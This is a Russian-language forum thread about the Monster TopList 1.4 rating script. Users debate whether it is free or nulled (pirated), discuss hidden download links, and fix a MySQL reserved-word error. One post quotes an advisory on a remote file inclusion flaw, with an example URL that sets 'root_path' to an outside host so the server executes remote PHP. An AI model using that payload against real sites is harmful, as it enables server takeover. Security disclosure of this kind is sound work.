Русифицированный Monster TopList 1.4

[Vanek]

Хороший ТОП, только я не понял он фри, или нулленый?

Разработчик сказал, 2 года назад был платный, сейчас уже фри

 

[Vanek]

У меня сообщение не редактируется, поэтому новое приходится создать.
Кто знает, что за ошибка

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'out,hits,rating_total,rating
FROM mtl_sites
' at line 1

Query: SELECT id,a_admin,cat,site_name,in_webring,votes,out,hits,rating_total,rating
FROM mtl_sites
WHERE owner='1'
ORDER BY site_name ASC

Connection:

Time: Sunday 12th April 2009, 7:41PM

 

[smithws]

зачем требовать так много сообщений?

Затем, что если все ценное выкладывать для всех, оно очень быстро превращается в ненужную рухляль.
Если каждый поставит себе к примеру этот скрипт, то бан оот Яши гораздо более вероятен.
Так что хайд-это добро, а халява-зло.

 

[deks_]

У меня сообщение не редактируется, поэтому новое приходится создать.
Кто знает, что за ошибка

Возникла такая же. Кстати, в скачанном отсюда дистрибутиве, который разместил пользователь maxdam.
Скажу больше, дистрибутив это не дистрибутив, а тупо копия ФТП уже ПОСЛЕ установки, то есть с её помощью по-человечески "установить" топлист не получится.

 

[Vincent]

Разработчик сказал, 2 года назад был платный, сейчас уже фри

Это с каких таких он фри? На Для просмотра ссылки Войди или Зарегистрируйся ничего про фри не сказано. 79 баков и всё тут.

 

[kainby]

может кто дать линк на инстал чистый, а не установленный.(хайд не обойду, но уверен линки там уже мертвые как и везде по гуглу)

кто нибудь делал систему наподобии mmotop.ru ?
PS по поводу хайдов толку отсофта который есть у 2-3 человек. в таком случае вообще по ПМ бы раскидали и молчали.
немного напрягают жлобы с нуленым софтом... Я еще понимаю сам занулил тут да труд.. нужно и поднять хайд.

 

[Maxerka]

Программа: Monster Top List 1.4, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "root_path" в сценарии "sources/functions.php". Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

Для просмотра ссылки Войди или Зарегистрируйся[path]/sources/functions.php?root_path=http://unsecured-systems.com/forum/

Источник: Для просмотра ссылки Войди или Зарегистрируйся

 

[oppo]

У меня сообщение не редактируется, поэтому новое приходится создать.
Кто знает, что за ошибка

смотрю скрипт 5 мин + google =
результат ошибки в поле таб. OUT
'out,hits,rating_total,rating
----------------------
в таблице

out int(11) NOT NULL default '0',

Разъяснение
OUT является зарезервированным словом . Начиная с MySQL версии 5.0, так что вы не должны использовать его в качестве поля таблицы

Добавлено через 6 минут
еще 5 мин исправление

$DB->query("SELECT id,a_admin,cat,site_name,in_webring,votes,`out` AS `out`,hits,rating_total,rating